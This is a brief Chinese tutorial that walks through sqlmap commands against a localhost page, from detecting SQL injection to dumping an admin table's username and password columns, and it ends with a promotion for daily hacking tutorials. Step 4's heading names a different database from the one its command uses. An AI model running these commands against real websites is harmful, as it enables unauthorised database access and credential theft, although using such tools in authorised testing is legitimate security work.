SQLmap 是一款用来检测与利用SQL注入漏洞的免费开源工具,在注入工具方面,一个sqlmap就足够用了,只要你能用的熟,它可以秒杀各种工具。并且它还可以跨平台使用,棒极了!
1.判断是否存在注入
sqlmap -u 127.0.0.1/show.php?newsid=4
存在注入
2.获取当前数据库
sqlmap -u 127.0.0.1/show.php?newsid=4 --dbs
3. 获取数据库admin下表名
sqlmap -u 127.0.0.1/show.php?newsid=4 -D admin --tables
4.获取数据库hfgx_new下pcms_admin的列名
sqlmap -u 127.0.0.1/show.php?newsid=4 -D admin -T pcms_admin --columns
扫描出pcms_admin下有 username password列名
5.获取内容
sqlmap -u 127.0.0.1/show.php?newsid=4 -D admin -T pcms_admin -C "username,password" --dump
喜欢黑客技术的话可以关注我
每天都会有相应的教程发布,
谢谢大家